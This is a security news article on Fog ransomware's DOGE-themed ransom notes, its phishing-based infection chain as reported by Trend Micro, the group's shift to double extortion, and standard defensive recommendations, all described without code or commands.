Fog ransomware operators have recently introduced a new tactic in their attacks by using DOGE-themed ransom notes. These notes mock victims and offer a free decryption key in exchange for spreading the malware to others.
Unlike previous campaigns where Fog relied on compromised VPN credentials for access, the latest wave of attacks begins with phishing emails containing a zip archive named “Pay Adjustment.zip.” Inside this archive is a malicious LNK file. Once clicked, the file triggers a series of actions that lead to the installation of the ransomware on the system, according to researchers at Trend Micro, who uncovered the campaign.
Fog Ransomware is Expanding Victim Count
Trend Micro’s analysis revealed that Fog ransomware has already impacted 100 victims since January 2024, with February seeing the highest number of incidents (53 victims). Since June, the researchers have identified 173 instances of ransomware activity linked to Fog within Trend customers. The sectors most affected include technology, manufacturing, education, and transportation.
The analysis showed that the malicious LNK file triggers a PowerShell script, which then retrieves a ransomware downloader, along with several other PowerShell scripts and executables. These scripts are designed to gather hardware and system information, facilitate lateral movement across networks, and display a QR code for victims to use when paying the ransom to a Monero wallet address. The script also opens politically themed YouTube videos and includes political commentary.
The DOGE-Themed Ransom Note
The ransom note that victims receive contains references to DOGE (Department of Government Efficiency), often humorously linking it to Elon Musk and other individuals at DOGE. The note humorously asks victims to list five tasks they’ve accomplished in the past week or pay a ransom amount of one trillion dollars.
In a postscript, the attacker offers the victim a free decryption key if they share the malware with someone else, adding a menacing line: “Don’t snitch now.” It also claims that the victim’s “trilatitude” and “trilongtitude” (a fictional measure) coordinates have been captured.
Fog ransomware was first identified in May 2024 by Arctic Wolf, which initially detected it targeting educational institutions in the U.S. The attacks began with the use of compromised VPN gateway credentials, allowing attackers to quickly encrypt valuable data on the victim network. Unlike other ransomware families, Fog operators initially did not exfiltrate data or operate a leak site, suggesting a focus on fast payouts.
However, recent activities tracked by Darktrace indicate that the threat actors behind Fog have shifted their approach. Now, the operators are employing double-extortion tactics—stealing data before deploying the ransomware to increase pressure on victims. In at least one observed attack, Fog encrypted data on a victim’s network in under two hours after initial access.
A Growing Threat
Trend Micro’s researchers caution that Fog ransomware is a growing threat that enterprises should be vigilant about. While the malware’s origins and motivations remain unclear, its potential for financial loss and operational disruption is significant. Whether the operators are using DOGE references for trolling or impersonating other actors, a successful Fog attack could have serious consequences for an organization.
To protect against Fog ransomware, Trend Micro has published indicators of compromise (IoCs) for monitoring its activity. Additionally, they recommend standard ransomware defense measures, such as maintaining secure backups of critical data, regularly testing restoration processes, segmenting networks, updating software, and training employees to recognize phishing and social engineering attacks.
